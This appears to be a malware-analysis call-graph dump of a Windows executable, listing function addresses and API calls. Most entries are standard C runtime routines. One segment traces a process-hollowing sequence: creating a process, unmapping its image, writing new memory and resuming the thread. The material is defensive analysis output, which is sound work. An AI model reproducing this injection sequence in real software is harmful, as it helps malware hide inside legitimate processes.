19512 40b79a InterlockedIncrement 19512->19513 19513->19512 19514 40b7aa InterlockedIncrement 19513->19514 19515 40b7b5 InterlockedIncrement 19513->19515 19514->19513 19515->19453 19520 406493 LeaveCriticalSection 19516->19520 19518 408c25 19518->19455 19519->19503 19520->19518 19564 40c7a3 19521->19564 19523 40771e 19524 40c7a3 __set_error_mode 67 API calls 19523->19524 19527 40772b 19523->19527 19524->19527 19525 40756c __NMSG_WRITE 67 API calls 19526 407743 19525->19526 19529 40756c __NMSG_WRITE 67 API calls 19526->19529 19527->19525 19528 406fda 19527->19528 19530 40756c 19528->19530 19529->19528 19531 407580 19530->19531 19532 40c7a3 __set_error_mode 64 API calls 19531->19532 19563 406fe2 19531->19563 19533 4075a2 19532->19533 19534 4076e0 GetStdHandle 19533->19534 19536 40c7a3 __set_error_mode 64 API calls 19533->19536 19535 4076ee _strlen 19534->19535 19534->19563 19539 407707 WriteFile 19535->19539 19535->19563 19537 4075b3 19536->19537 19537->19534 19538 4075c5 19537->19538 19538->19563 19570 40c73b 19538->19570 19539->19563 19542 4075fb GetModuleFileNameA 19544 407619 19542->19544 19548 40763c _strlen 19542->19548 19546 40c73b _strcpy_s 64 API calls 19544->19546 19547 407629 19546->19547 19547->19548 19550 4080ba __invoke_watson 10 API calls 19547->19550 19549 40767f 19548->19549 19586 40c5f2 19548->19586 19595 40c57e 19549->19595 19550->19548 19555 4076a3 19557 40c57e _strcat_s 64 API calls 19555->19557 19556 4080ba __invoke_watson 10 API calls 19556->19555 19558 4076b7 19557->19558 19560 4076c8 19558->19560 19561 4080ba __invoke_watson 10 API calls 19558->19561 19559 4080ba __invoke_watson 10 API calls 19559->19549 19604 40c415 19560->19604 19561->19560 19563->19415 19565 40c7b2 19564->19565 19566 40c7bc 19565->19566 19567 405968 _strcat_s 67 API calls 19565->19567 19566->19523 19568 40c7d5 19567->19568 19569 4081e2 _strcat_s 6 API calls 19568->19569 19569->19566 19571 40c74c 19570->19571 19573 40c753 19570->19573 19571->19573 19577 40c779 19571->19577 19572 405968 _strcat_s 67 API calls 19574 40c758 19572->19574 19573->19572 19575 4081e2 _strcat_s 6 API calls 19574->19575 19576 4075e7 19575->19576 19576->19542 19579 4080ba 19576->19579 19577->19576 19578 405968 _strcat_s 67 API calls 19577->19578 19578->19574 19631 4072e0 19579->19631 19581 4080e7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19582 4081c3 GetCurrentProcess TerminateProcess 19581->19582 19583 4081b7 __invoke_watson 19581->19583 19633 407750 19582->19633 19583->19582 19585 4075f8 19585->19542 19590 40c604 19586->19590 19587 40c608 19588 40766c 19587->19588 19589 405968 _strcat_s 67 API calls 19587->19589 19588->19549 19588->19559 19591 40c624 19589->19591 19590->19587 19590->19588 19593 40c64e 19590->19593 19592 4081e2 _strcat_s 6 API calls 19591->19592 19592->19588 19593->19588 19594 405968 _strcat_s 67 API calls 19593->19594 19594->19591 19598 40c596 19595->19598 19599 40c58f 19595->19599 19596 405968 _strcat_s 67 API calls 19597 40c59b 19596->19597 19600 4081e2 _strcat_s 6 API calls 19597->19600 19598->19596 19599->19598 19602 40c5ca 19599->19602 19601 407692 19600->19601 19601->19555 19601->19556 19602->19601 19603 405968 _strcat_s 67 API calls 19602->19603 19603->19597 19642 408a4b 19604->19642 19607 40c438 LoadLibraryA 19608 40c44d GetProcAddress 19607->19608 19616 40c562 19607->19616 19610 40c463 19608->19610 19608->19616 19609 40c4c0 19614 408a54 __decode_pointer 6 API calls 19609->19614 19626 40c4ea 19609->19626 19645 4089d9 TlsGetValue 19610->19645 19612 408a54 __decode_pointer 6 API calls 19612->19616 19613 408a54 __decode_pointer 6 API calls 19623 40c52d 19613->19623 19617 40c4dd 19614->19617 19616->19563 19618 408a54 __decode_pointer 6 API calls 19617->19618 19618->19626 19619 4089d9 __encode_pointer 6 API calls 19620 40c47e GetProcAddress 19619->19620 19621 4089d9 __encode_pointer 6 API calls 19620->19621 19622 40c493 GetProcAddress 19621->19622 19624 4089d9 __encode_pointer 6 API calls 19622->19624 19625 408a54 __decode_pointer 6 API calls 19623->19625 19628 40c515 19623->19628 19627 40c4a8 19624->19627 19625->19628 19626->19613 19626->19628 19627->19609 19629 40c4b2 GetProcAddress 19627->19629 19628->19612 19630 4089d9 __encode_pointer 6 API calls 19629->19630 19630->19609 19632 4072ec __VEC_memzero 19631->19632 19632->19581 19634 407758 19633->19634 19635 40775a IsDebuggerPresent 19633->19635 19634->19585 19641 40d461 19635->19641 19638 40c8bb SetUnhandledExceptionFilter UnhandledExceptionFilter 19639 40c8e0 GetCurrentProcess TerminateProcess 19638->19639 19640 40c8d8 __invoke_watson 19638->19640 19639->19585 19640->19639 19641->19638 19643 4089d9 __encode_pointer 6 API calls 19642->19643 19644 408a52 19643->19644 19644->19607 19644->19609 19646 4089f1 19645->19646 19647 408a12 GetModuleHandleW 19645->19647 19646->19647 19648 4089fb TlsGetValue 19646->19648 19649 408a22 19647->19649 19650 408a2d GetProcAddress 19647->19650 19653 408a06 19648->19653 19651 406fa0 __crt_waiting_on_module_handle 2 API calls 19649->19651 19654 408a0a GetProcAddress 19650->19654 19652 408a28 19651->19652 19652->19650 19652->19654 19653->19647 19653->19654 19654->19619 19658 406493 LeaveCriticalSection 19655->19658 19657 40b1d5 19657->19336 19658->19657 19660 40694f 19659->19660 19666 40699c 19659->19666 19661 408ca0 __getptd 67 API calls 19660->19661 19662 406954 19661->19662 19663 40697c 19662->19663 19667 40b89f 19662->19667 19665 40b133 __setmbcp 69 API calls 19663->19665 19663->19666 19665->19666 19666->19349 19666->19350 19668 40b8ab __mtinitlocknum 19667->19668 19669 408ca0 __getptd 67 API calls 19668->19669 19670 40b8b0 19669->19670 19671 40b8de 19670->19671 19673 40b8c2 19670->19673 19672 40656d __lock 67 API calls 19671->19672 19675 40b8e5 19672->19675 19674 408ca0 __getptd 67 API calls 19673->19674 19676 40b8c7 19674->19676 19682 40b861 19675->19682 19679 40b8d5 __mtinitlocknum 19676->19679 19681 406fd0 __amsg_exit 67 API calls 19676->19681 19679->19663 19681->19679 19683 40b865 19682->19683 19689 40b897 19682->19689 19684 40b739 ___addlocaleref 8 API calls 19683->19684 19683->19689 19685 40b878 19684->19685 19685->19689 19693 40b7c8 19685->19693 19690 40b909 19689->19690 19849 406493 LeaveCriticalSection 19690->19849 19692 40b910 19692->19676 19694 40b7d9 InterlockedDecrement 19693->19694 19695 40b85c 19693->19695 19696 40b7f1 19694->19696 19697 40b7ee InterlockedDecrement 19694->19697 19695->19689 19707 40b5f0 19695->19707 19698 40b7fb InterlockedDecrement 19696->19698 19699 40b7fe 19696->19699 19697->19696 19698->19699 19700 40b808 InterlockedDecrement 19699->19700 19701 40b80b 19699->19701 19700->19701 19702 40b815 InterlockedDecrement 19701->19702 19704 40b818 19701->19704 19702->19704 19703 40b831 InterlockedDecrement 19703->19704 19704->19703 19705 40b841 InterlockedDecrement 19704->19705 19706 40b84c InterlockedDecrement 19704->19706 19705->19704 19706->19695 19708 40b674 19707->19708 19710 40b607 19707->19710 19709 407e83 ___freetlocinfo 67 API calls 19708->19709 19711 40b6c1 19708->19711 19712 40b695 19709->19712 19710->19708 19717 40b63b 19710->19717 19720 407e83 ___freetlocinfo 67 API calls 19710->19720 19731 40b6e8 19711->19731 19761 40e325 19711->19761 19714 407e83 ___freetlocinfo 67 API calls 19712->19714 19716 40b6a8 19714->19716 19722 407e83 ___freetlocinfo 67 API calls 19716->19722 19724 407e83 ___freetlocinfo 67 API calls 19717->19724 19736 40b65c 19717->19736 19718 407e83 ___freetlocinfo 67 API calls 19725 40b669 19718->19725 19719 40b72d 19726 407e83 ___freetlocinfo 67 API calls 19719->19726 19727 40b630 19720->19727 19721 407e83 ___freetlocinfo 67 API calls 19721->19731 19730 40b6b6 19722->19730 19723 407e83 67 API calls ___freetlocinfo 19723->19731 19732 40b651 19724->19732 19733 407e83 ___freetlocinfo 67 API calls 19725->19733 19728 40b733 19726->19728 19737 40e4ff 19727->19737 19728->19689 19734 407e83 ___freetlocinfo 67 API calls 19730->19734 19731->19719 19731->19723 19753 40e4ba 19732->19753 19733->19708 19734->19711 19736->19718 19738 40e50c 19737->19738 19752 40e589 19737->19752 19739 40e51d 19738->19739 19740 407e83 ___freetlocinfo 67 API calls 19738->19740 19741 40e52f 19739->19741 19743 407e83 ___freetlocinfo 67 API calls 19739->19743 19740->19739 19742 40e541 19741->19742 19744 407e83 ___freetlocinfo 67 API calls 19741->19744 19745 40e553 19742->19745 19746 407e83 ___freetlocinfo 67 API calls 19742->19746 19743->19741 19744->19742 19747 40e565 19745->19747 19748 407e83 ___freetlocinfo 67 API calls 19745->19748 19746->19745 19749 407e83 ___freetlocinfo 67 API calls 19747->19749 19751 40e577 19747->19751 19748->19747 19749->19751 19750 407e83 ___freetlocinfo 67 API calls 19750->19752 19751->19750 19751->19752 19752->19717 19754 40e4c7 19753->19754 19760 40e4fb 19753->19760 19755 40e4d7 19754->19755 19756 407e83 ___freetlocinfo 67 API calls 19754->19756 19757 40e4e9 19755->19757 19758 407e83 ___freetlocinfo 67 API calls 19755->19758 19756->19755 19759 407e83 ___freetlocinfo 67 API calls 19757->19759 19757->19760 19758->19757 19759->19760 19760->19736 19762 40e336 19761->19762 19848 40b6e1 19761->19848 19763 407e83 ___freetlocinfo 67 API calls 19762->19763 19764 40e33e 19763->19764 19765 407e83 ___freetlocinfo 67 API calls 19764->19765 19766 40e346 19765->19766 19767 407e83 ___freetlocinfo 67 API calls 19766->19767 19768 40e34e 19767->19768 19769 407e83 ___freetlocinfo 67 API calls 19768->19769 19770 40e356 19769->19770 19771 407e83 ___freetlocinfo 67 API calls 19770->19771 19772 40e35e 19771->19772 19773 407e83 ___freetlocinfo 67 API calls 19772->19773 19774 40e366 19773->19774 19775 407e83 ___freetlocinfo 67 API calls 19774->19775 19776 40e36d 19775->19776 19777 407e83 ___freetlocinfo 67 API calls 19776->19777 19778 40e375 19777->19778 19779 407e83 ___freetlocinfo 67 API calls 19778->19779 19780 40e37d 19779->19780 19781 407e83 ___freetlocinfo 67 API calls 19780->19781 19782 40e385 19781->19782 19783 407e83 ___freetlocinfo 67 API calls 19782->19783 19784 40e38d 19783->19784 19785 407e83 ___freetlocinfo 67 API calls 19784->19785 19786 40e395 19785->19786 19787 407e83 ___freetlocinfo 67 API calls 19786->19787 19788 40e39d 19787->19788 19789 407e83 ___freetlocinfo 67 API calls 19788->19789 19790 40e3a5 19789->19790 19791 407e83 ___freetlocinfo 67 API calls 19790->19791 19792 40e3ad 19791->19792 19793 407e83 ___freetlocinfo 67 API calls 19792->19793 19794 40e3b5 19793->19794 19795 407e83 ___freetlocinfo 67 API calls 19794->19795 19796 40e3c0 19795->19796 19797 407e83 ___freetlocinfo 67 API calls 19796->19797 19798 40e3c8 19797->19798 19799 407e83 ___freetlocinfo 67 API calls 19798->19799 19800 40e3d0 19799->19800 19801 407e83 ___freetlocinfo 67 API calls 19800->19801 19802 40e3d8 19801->19802 19803 407e83 ___freetlocinfo 67 API calls 19802->19803 19804 40e3e0 19803->19804 19805 407e83 ___freetlocinfo 67 API calls 19804->19805 19806 40e3e8 19805->19806 19807 407e83 ___freetlocinfo 67 API calls 19806->19807 19808 40e3f0 19807->19808 19809 407e83 ___freetlocinfo 67 API calls 19808->19809 19810 40e3f8 19809->19810 19811 407e83 ___freetlocinfo 67 API calls 19810->19811 19812 40e400 19811->19812 19813 407e83 ___freetlocinfo 67 API calls 19812->19813 19814 40e408 19813->19814 19815 407e83 ___freetlocinfo 67 API calls 19814->19815 19816 40e410 19815->19816 19817 407e83 ___freetlocinfo 67 API calls 19816->19817 19818 40e418 19817->19818 19819 407e83 ___freetlocinfo 67 API calls 19818->19819 19820 40e420 19819->19820 19821 407e83 ___freetlocinfo 67 API calls 19820->19821 19822 40e428 19821->19822 19823 407e83 ___freetlocinfo 67 API calls 19822->19823 19824 40e430 19823->19824 19825 407e83 ___freetlocinfo 67 API calls 19824->19825 19826 40e438 19825->19826 19827 407e83 ___freetlocinfo 67 API calls 19826->19827 19828 40e446 19827->19828 19829 407e83 ___freetlocinfo 67 API calls 19828->19829 19830 40e451 19829->19830 19831 407e83 ___freetlocinfo 67 API calls 19830->19831 19832 40e45c 19831->19832 19833 407e83 ___freetlocinfo 67 API calls 19832->19833 19834 40e467 19833->19834 19835 407e83 ___freetlocinfo 67 API calls 19834->19835 19836 40e472 19835->19836 19837 407e83 ___freetlocinfo 67 API calls 19836->19837 19838 40e47d 19837->19838 19839 407e83 ___freetlocinfo 67 API calls 19838->19839 19840 40e488 19839->19840 19841 407e83 ___freetlocinfo 67 API calls 19840->19841 19842 40e493 19841->19842 19843 407e83 ___freetlocinfo 67 API calls 19842->19843 19844 40e49e 19843->19844 19845 407e83 ___freetlocinfo 67 API calls 19844->19845 19846 40e4a9 19845->19846 19847 407e83 ___freetlocinfo 67 API calls 19846->19847 19847->19848 19848->19721 19849->19692 19851 40d9b3 19850->19851 19860 40d912 19850->19860 19852 409a7a __calloc_impl 6 API calls 19851->19852 19853 40d9b9 19852->19853 19854 405968 _strcat_s 66 API calls 19853->19854 19867 40d9ab 19854->19867 19855 407717 __FF_MSGBANNER 66 API calls 19859 40d923 19855->19859 19856 40756c __NMSG_WRITE 66 API calls 19856->19859 19858 40d96f HeapAlloc 19858->19860 19859->19855 19859->19856 19859->19858 19859->19860 19868 407024 19859->19868 19860->19859 19862 40d99f 19860->19862 19863 409a7a __calloc_impl 6 API calls 19860->19863 19865 40d9a4 19860->19865 19860->19867 19871 40d8b1 19860->19871 19864 405968 _strcat_s 66 API calls 19862->19864 19863->19860 19864->19865 19866 405968 _strcat_s 66 API calls 19865->19866 19866->19867 19867->19354 19879 406ff9 GetModuleHandleW 19868->19879 19872 40d8bd __mtinitlocknum 19871->19872 19873 40656d __lock 67 API calls 19872->19873 19875 40d8ee __mtinitlocknum 19872->19875 19874 40d8d3 19873->19874 19876 40a281 ___sbh_alloc_block 5 API calls 19874->19876 19875->19860 19877 40d8de 19876->19877 19882 40d8f7 19877->19882 19880 40701d ExitProcess 19879->19880 19881 40700d GetProcAddress 19879->19881 19881->19880 19885 406493 LeaveCriticalSection 19882->19885 19884 40d8fe 19884->19875 19885->19884 19888 40afd4 _memset 19886->19888 19895 40b086 19886->19895 19896 40e2e3 19888->19896 19890 407750 __invoke_watson 5 API calls 19892 40b131 19890->19892 19892->19367 19894 40e0e4 ___crtLCMapStringA 102 API calls 19894->19895 19895->19890 19897 40693c _LocaleUpdate::_LocaleUpdate 77 API calls 19896->19897 19898 40e2f6 19897->19898 19906 40e129 19898->19906 19901 40e0e4 19902 40693c _LocaleUpdate::_LocaleUpdate 77 API calls 19901->19902 19903 40e0f7 19902->19903 19991 40dd3f 19903->19991 19907 40e175 19906->19907 19908 40e14a GetStringTypeW 19906->19908 19909 40e162 19907->19909 19911 40e25c 19907->19911 19908->19909 19910 40e16a GetLastError 19908->19910 19912 40e1ae MultiByteToWideChar 19909->19912 19929 40e256 19909->19929 19910->19907 19934 40febb GetLocaleInfoA 19911->19934 19918 40e1db 19912->19918 19912->19929 19914 407750 __invoke_watson 5 API calls 19916 40b041 19914->19916 19916->19901 19917 40e1f0 _memset ___convertcp 19920 40e229 MultiByteToWideChar 19917->19920 19917->19929 19918->19917 19922 40d900 _malloc 67 API calls 19918->19922 19919 40e2ad GetStringTypeA 19921 40e2c8 19919->19921 19919->19929 19925 40e250 19920->19925 19926 40e23f GetStringTypeW 19920->19926 19927 407e83 ___freetlocinfo 67 API calls 19921->19927 19922->19917 19930 40dd1f 19925->19930 19926->19925 19927->19929 19929->19914 19931 40dd2b 19930->19931 19932 40dd3c 19930->19932 19931->19932 19933 407e83 ___freetlocinfo 67 API calls 19931->19933 19932->19929 19933->19932 19935 40fee9 19934->19935 19936 40feee 19934->19936 19938 407750 __invoke_watson 5 API calls 19935->19938 19965 40503e 19936->19965 19939 40e280 19938->19939 19939->19919 19939->19929 19940 40ff04 19939->19940 19941 40ffce 19940->19941 19942 40ff44 GetCPInfo 19940->19942 19945 407750 __invoke_watson 5 API calls 19941->19945 19943 40ffb9 MultiByteToWideChar 19942->19943 19944 40ff5b 19942->19944 19943->19941 19949 40ff74 _strlen 19943->19949 19944->19943 19946 40ff61 GetCPInfo 19944->19946 19947 40e2a1 19945->19947 19946->19943 19948 40ff6e 19946->19948 19947->19919 19947->19929 19948->19943 19948->19949 19950 40d900 _malloc 67 API calls 19949->19950 19954 40ffa6 _memset ___convertcp 19949->19954 19950->19954 19951 410003 MultiByteToWideChar 19952 41001b 19951->19952 19953 41003a 19951->19953 19956 410022 WideCharToMultiByte 19952->19956 19957 41003f 19952->19957 19955 40dd1f __freea 67 API calls 19953->19955 19954->19941 19954->19951 19955->19941 19956->19953 19958 41004a WideCharToMultiByte 19957->19958 19959 41005e 19957->19959 19958->19953 19958->19959 19960 40ab33 __calloc_crt 67 API calls 19959->19960 19961 410066 19960->19961 19961->19953 19962 41006f WideCharToMultiByte 19961->19962 19962->19953 19963 410081 19962->19963 19964 407e83 ___freetlocinfo 67 API calls 19963->19964 19964->19953 19968 406bf2 19965->19968 19969 406c0b 19968->19969 19972 4069c3 19969->19972 19973 40693c _LocaleUpdate::_LocaleUpdate 77 API calls 19972->19973 19974 4069d8 19973->19974 19975 4069ea 19974->19975 19980 406a27 19974->19980 19976 405968 _strcat_s 67 API calls 19975->19976 19977 4069ef 19976->19977 19978 4081e2 _strcat_s 6 API calls 19977->19978 19983 40504f 19978->19983 19982 406a6c 19980->19982 19984 40b915 19980->19984 19981 405968 _strcat_s 67 API calls 19981->19983 19982->19981 19982->19983 19983->19935 19985 40693c _LocaleUpdate::_LocaleUpdate 77 API calls 19984->19985 19986 40b929 19985->19986 19987 40b936 19986->19987 19988 40a75c __isleadbyte_l 77 API calls 19986->19988 19987->19980 19989 40b95e 19988->19989 19990 40e2e3 ___crtGetStringTypeA 91 API calls 19989->19990 19990->19987 19992 40dd60 LCMapStringW 19991->19992 19995 40dd7b 19991->19995 19993 40dd83 GetLastError 19992->19993 19992->19995 19993->19995 19994 40df79 19997 40febb ___ansicp 91 API calls 19994->19997 19995->19994 19996 40ddd5 19995->19996 19998 40ddee MultiByteToWideChar 19996->19998 20020 40df70 19996->20020 19999 40dfa1 19997->19999 20004 40de1b 19998->20004 19998->20020 20002 40e095 LCMapStringA 19999->20002 20003 40dfba 19999->20003 19999->20020 20000 407750 __invoke_watson 5 API calls 20001 40b061 20000->20001 20001->19894 20037 40dff1 20002->20037 20005 40ff04 ___convertcp 74 API calls 20003->20005 20008 40d900 _malloc 67 API calls 20004->20008 20017 40de34 ___convertcp 20004->20017 20009 40dfcc 20005->20009 20006 40de6c MultiByteToWideChar 20010 40de85 LCMapStringW 20006->20010 20011 40df67 20006->20011 20007 40e0bc 20018 407e83 ___freetlocinfo 67 API calls 20007->20018 20007->20020 20008->20017 20013 40dfd6 LCMapStringA 20009->20013 20009->20020 20010->20011 20015 40dea6 20010->20015 20014 40dd1f __freea 67 API calls 20011->20014 20012 407e83 ___freetlocinfo 67 API calls 20012->20007 20023 40dff8 20013->20023 20013->20037 20014->20020 20016 40deaf 20015->20016 20022 40ded8 20015->20022 20016->20011 20019 40dec1 LCMapStringW 20016->20019 20017->20006 20017->20020 20018->20020 20019->20011 20020->20000 20021 40df27 LCMapStringW 20024 40df61 20021->20024 20025 40df3f WideCharToMultiByte 20021->20025 20027 40def3 ___convertcp 20022->20027 20029 40d900 _malloc 67 API calls 20022->20029 20026 40d900 _malloc 67 API calls 20023->20026 20028 40e009 _memset ___convertcp 20023->20028 20030 40dd1f __freea 67 API calls 20024->20030 20025->20024 20026->20028 20027->20011 20027->20021 20031 40e047 LCMapStringA 20028->20031 20028->20037 20029->20027 20030->20011 20033 40e067 20031->20033 20034 40e063 20031->20034 20035 40ff04 ___convertcp 74 API calls 20033->20035 20036 40dd1f __freea 67 API calls 20034->20036 20035->20034 20036->20037 20037->20007 20037->20012 20039 409b11 20038->20039 20044 409db3 20038->20044 20040 409cfd VirtualFree 20039->20040 20039->20044 20041 409d61 20040->20041 20042 409d70 VirtualFree HeapFree 20041->20042 20041->20044 20048 40d500 20042->20048 20044->19379 20052 406493 LeaveCriticalSection 20045->20052 20047 407ee0 20047->19370 20049 40d518 20048->20049 20050 40d53f __VEC_memcpy 20049->20050 20051 40d547 20049->20051 20050->20051 20051->20044 20052->20047 20054 4064b6 __mtinitlocknum 20053->20054 20055 4064dc 20054->20055 20056 407717 __FF_MSGBANNER 67 API calls 20054->20056 20057 40aaee __malloc_crt 67 API calls 20055->20057 20063 4064ec __mtinitlocknum 20055->20063 20058 4064cb 20056->20058 20059 4064f7 20057->20059 20060 40756c __NMSG_WRITE 67 API calls 20058->20060 20061 40650d 20059->20061 20062 4064fe 20059->20062 20064 4064d2 20060->20064 20066 40656d __lock 67 API calls 20061->20066 20065 405968 _strcat_s 67 API calls 20062->20065 20063->19386 20067 407024 __mtinitlocknum 3 API calls 20064->20067 20065->20063 20068 406514 20066->20068 20067->20055 20069 406548 20068->20069 20070 40651c 20068->20070 20071 407e83 ___freetlocinfo 67 API calls 20069->20071 20079 40aa8e 20070->20079 20073 406539 20071->20073 20083 406564 20073->20083 20074 406527 20074->20073 20075 407e83 ___freetlocinfo 67 API calls 20074->20075 20077 406533 20075->20077 20078 405968 _strcat_s 67 API calls 20077->20078 20078->20073 20086 406750 20079->20086 20081 40aa9a InitializeCriticalSectionAndSpinCount 20082 40aade __mtinitlocknum 20081->20082 20082->20074 20087 406493 LeaveCriticalSection 20083->20087 20085 40656b 20085->20063 20086->20081 20087->20085 20088->19391 20089 630000 20092 630630 20089->20092 20091 630005 20093 63064c 20092->20093 20095 631577 20093->20095 20098 6305b0 20095->20098 20101 6305dc 20098->20101 20099 6305e2 GetFileAttributesA 20099->20101 20100 63061e 20101->20099 20101->20100 20103 630420 20101->20103 20104 6304f3 20103->20104 20105 6304fa 20104->20105 20106 6304ff CreateWindowExA 20104->20106 20105->20101 20106->20105 20107 630540 PostMessageA 20106->20107 20108 63055f 20107->20108 20108->20105 20110 630110 VirtualAlloc 20108->20110 20111 63016e 20110->20111 20112 630414 20111->20112 20113 63024a CreateProcessA 20111->20113 20112->20108 20113->20112 20114 63025f VirtualFree VirtualAlloc Wow64GetThreadContext 20113->20114 20114->20112 20115 6302a9 ReadProcessMemory 20114->20115 20116 6302e5 VirtualAllocEx NtWriteVirtualMemory 20115->20116 20117 6302d5 NtUnmapViewOfSection 20115->20117 20118 63033b 20116->20118 20117->20116 20119 630350 NtWriteVirtualMemory 20118->20119 20120 63039d WriteProcessMemory Wow64SetThreadContext ResumeThread 20118->20120 20119->20118 20121 6303fb ExitProcess 20120->20121 20123 567b63 20124 567b72 20123->20124 20127 568303 20124->20127 20128 56831e 20127->20128 20129 568327 CreateToolhelp32Snapshot 20128->20129 20130 568343 Module32First 20128->20130 20129->20128 20129->20130 20131 568352 20130->20131 20132 567b7b 20130->20132 20134 567fc2 20131->20134 20135 567fed 20134->20135 20136 567ffe VirtualAlloc 20135->20136 20137 568036 20135->20137 20136->20137 20137->20137 20138 405435 20139 405446 20138->20139 20173 408f76 HeapCreate 20139->20173 20142 405485 20175 408de9 GetModuleHandleW 20142->20175 20146 405496 __RTC_Initialize 20209 408739 20146->20209 20147 4053dd _fast_error_exit 67 API calls 20147->20146 20149 4054a4 20150 4054b0 GetCommandLineW 20149->20150 20152 406fd0 __amsg_exit 67 API calls 20149->20152 20224 4086dc GetEnvironmentStringsW 20150->20224 20154 4054af 20152->20154 20153 4054bf 20230 40862e GetModuleFileNameW 20153->20230 20154->20150 20156 4054c9 20157 4054d4 20156->20157 20158 406fd0 __amsg_exit 67 API calls 20156->20158 20234 4083ff 20157->20234 20158->20157 20160 4054e5 20247 40708f 20160->20247 20162 406fd0 __amsg_exit 67 API calls 20162->20160 20164 4054ec 20165 406fd0 __amsg_exit 67 API calls 20164->20165 20166 4054f7 __wwincmdln 20164->20166 20165->20166 20253 404830 20166->20253 20169 405526 20270 40726c 20169->20270 20172 40552b __mtinitlocknum 20174 405479 20173->20174 20174->20142 20259 4053dd 20174->20259 20176 408e04 20175->20176 20177 408dfd 20175->20177 20178 408f6c 20176->20178 20179 408e0e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 20176->20179 20180 406fa0 __crt_waiting_on_module_handle 2 API calls 20177->20180 20284 408b03 20178->20284 20182 408e57 TlsAlloc 20179->20182 20181 408e03 20180->20181 20181->20176 20185 40548b 20182->20185 20186 408ea5 TlsSetValue 20182->20186 20185->20146 20185->20147 20186->20185 20187 408eb6 20186->20187 20273 40728a 20187->20273 20190 4089d9 __encode_pointer 6 API calls 20191 408ec6 20190->20191 20192 4089d9 __encode_pointer 6 API calls 20191->20192 20193 408ed6 20192->20193 20194 4089d9 __encode_pointer 6 API calls 20193->20194 20195 408ee6 20194->20195 20196 4089d9 __encode_pointer 6 API calls 20195->20196 20197 408ef6 20196->20197 20280 4063f1 20197->20280 20200 408a54 __decode_pointer 6 API calls 20201 408f17 20200->20201 20201->20178 20202 40ab33 __calloc_crt 67 API calls 20201->20202 20203 408f30 20202->20203 20203->20178 20204 408a54 __decode_pointer 6 API calls 20203->20204 20205 408f4a 20204->20205 20205->20178 20206 408f51 20205->20206 20207 408b40 __initptd 67 API calls 20206->20207 20208 408f59 GetCurrentThreadId 20207->20208 20208->20185 20293 406750 20209->20293 20211 408745 GetStartupInfoA 20212 40ab33 __calloc_crt 67 API calls 20211->20212 20219 408766 20212->20219 20213 408984 __mtinitlocknum 20213->20149 20214 408901 GetStdHandle 20218 4088cb 20214->20218 20215 408966 SetHandleCount 20215->20213 20216 40ab33 __calloc_crt 67 API calls 20216->20219 20217 408913 GetFileType 20217->20218 20218->20213 20218->20214 20218->20215 20218->20217 20222 40aa8e __mtinitlocknum InitializeCriticalSectionAndSpinCount 20218->20222 20219->20213 20219->20216 20219->20218 20220 40884e 20219->20220 20220->20213 20220->20218 20221 408877 GetFileType 20220->20221 20223 40aa8e __mtinitlocknum InitializeCriticalSectionAndSpinCount 20220->20223 20221->20220 20222->20218 20223->20220 20225 4086f1 20224->20225 20226 4086ed 20224->20226 20227 40aaee __malloc_crt 67 API calls 20225->20227 20226->20153 20228 408712 _realloc 20227->20228 20229 408719 FreeEnvironmentStringsW 20228->20229 20229->20153 20231 408663 _wparse_cmdline 20230->20231 20232 40aaee __malloc_crt 67 API calls 20231->20232 20233 4086a6 _wparse_cmdline 20231->20233 20232->20233 20233->20156 20235 408417 _wcslen 20234->20235 20239 4054da 20234->20239 20236 40ab33 __calloc_crt 67 API calls 20235->20236 20242 40843b _wcslen 20236->20242 20237 4084a0 20238 407e83 ___freetlocinfo 67 API calls 20237->20238 20238->20239 20239->20160 20239->20162 20240 40ab33 __calloc_crt 67 API calls 20240->20242 20241 4084c6 20243 407e83 ___freetlocinfo 67 API calls 20241->20243 20242->20237 20242->20239 20242->20240 20242->20241 20246 408485 20242->20246 20294 40d469 20242->20294 20243->20239 20245 4080ba __invoke_watson 10 API calls 20245->20246 20246->20242 20246->20245 20249 40709d __IsNonwritableInCurrentImage 20247->20249 20303 40bf34 20249->20303 20250 4070bb __initterm_e 20252 4070da __IsNonwritableInCurrentImage __initterm 20250->20252 20307 40bf1d 20250->20307 20252->20164 20254 404ba0 20253->20254 20407 404530 20254->20407 20256 404bc0 20257 404bdc GetCurrentDirectoryA 20256->20257 20258 404bec 20256->20258 20257->20256 20258->20169 20267 407240 20258->20267 20260 4053f0 20259->20260 20261 4053eb 20259->20261 20263 40756c __NMSG_WRITE 67 API calls 20260->20263 20262 407717 __FF_MSGBANNER 67 API calls 20261->20262 20262->20260 20264 4053f8 20263->20264 20265 407024 __mtinitlocknum 3 API calls 20264->20265 20266 405402 20265->20266 20266->20142 20855 407114 20267->20855 20269 407251 20269->20169 20271 407114 _doexit 67 API calls 20270->20271 20272 407277 20271->20272 20272->20172 20274 408a4b _doexit 6 API calls 20273->20274 20275 407292 __init_pointers __initp_misc_winsig 20274->20275 20290 40bf8e 20275->20290 20278 4089d9 __encode_pointer 6 API calls 20279 4072ce 20278->20279 20279->20190 20281 4063fc 20280->20281 20282 40aa8e __mtinitlocknum InitializeCriticalSectionAndSpinCount 20281->20282 20283 40642a 20281->20283 20282->20281 20283->20178 20283->20200 20285 408b19 20284->20285 20286 408b0d 20284->20286 20288 408b3b 20285->20288 20289 408b2d TlsFree 20285->20289 20287 408a54 __decode_pointer 6 API calls 20286->20287 20287->20285 20288->20288 20289->20288 20291 4089d9 __encode_pointer 6 API calls 20290->20291 20292 4072c4 20291->20292 20292->20278 20293->20211 20295 40d47a 20294->20295 20297 40d481 20294->20297 20295->20297 20300 40d4ad 20295->20300 20296 405968 _strcat_s 67 API calls 20298 40d486 20296->20298 20297->20296 20299 4081e2 _strcat_s 6 API calls 20298->20299 20301 40d495 20299->20301 20300->20301 20302 405968 _strcat_s 67 API calls 20300->20302 20301->20242 20302->20298 20304 40bf3a 20303->20304 20305 4089d9 __encode_pointer 6 API calls 20304->20305 20306 40bf52 20304->20306 20305->20304 20306->20250 20310 40bee1 20307->20310 20309 40bf2a 20309->20252 20311 40beed __mtinitlocknum 20310->20311 20318 40703c 20311->20318 20317 40bf0e __mtinitlocknum 20317->20309 20319 40656d __lock 67 API calls 20318->20319 20320 407043 20319->20320 20321 40bdf6 20320->20321 20322 408a54 __decode_pointer 6 API calls 20321->20322 20323 40be0a 20322->20323 20324 408a54 __decode_pointer 6 API calls 20323->20324 20325 40be1a 20324->20325 20326 40be9d 20325->20326 20341 40f5eb 20325->20341 20338 40bf17 20326->20338 20328 40be84 20329 4089d9 __encode_pointer 6 API calls 20328->20329 